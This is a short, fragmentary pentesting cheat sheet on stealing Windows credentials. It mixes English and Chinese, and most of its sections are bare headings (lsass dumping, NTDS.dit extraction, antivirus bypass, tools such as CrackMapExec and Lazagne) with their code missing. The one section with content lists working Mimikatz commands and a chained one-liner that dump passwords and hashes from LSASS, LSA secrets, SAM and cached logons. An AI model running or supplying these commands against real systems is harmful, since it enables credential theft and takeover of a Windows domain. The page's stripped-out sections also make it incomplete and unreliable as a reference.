Stealing Windows Credentials
凭证 Mimikatz
#Elevate Privileges to extract the credentials
privilege::debug #This should give am error if you are Admin, butif it does, check if the SeDebugPrivilege was removed from Admins
token::elevate
#Extract from lsass (memory)
sekurlsa::logonpasswords
#Extract from lsass (service)
lsadump::lsa /inject
#Extract from SAM
lsadump::sam
#One liner
mimikatz "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" "lsadump::lsa /inject" "lsadump::sam" "lsadump::cache" "sekurlsa::ekeys" "exit"Invoke-Mimikatz
使用 Meterpreter 获取凭证
绕过杀毒软件
Procdump + Mimikatz
使用comsvcs.dll转储lsass
使用任务管理器转储 lsass
使用 procdump 转储 lsass
使用PPLBlade转储lsass
CrackMapExec
转储 SAM 哈希
转储 LSA 机密
从目标 DC 转储 NTDS.dit
从目标 DC 中转储 NTDS.dit 密码历史
显示每个NTDS.dit帐户的pwdLastSet属性
窃取 SAM & SYSTEM
从注册表中
卷影复制
使用vssadmin
Invoke-NinjaCopy
Active Directory凭证 - NTDS.dit
解密NTDS.dit中的哈希值
使用Ntdsutil复制NTDS.dit
从NTDS.dit中提取哈希值
将NTDS.dit中的域对象提取到SQLite数据库
Lazagne
从SAM和LSASS中提取凭据的其他工具
Windows凭据编辑器(WCE)
fgdump
PwDump
PwDump7
防御
最后更新于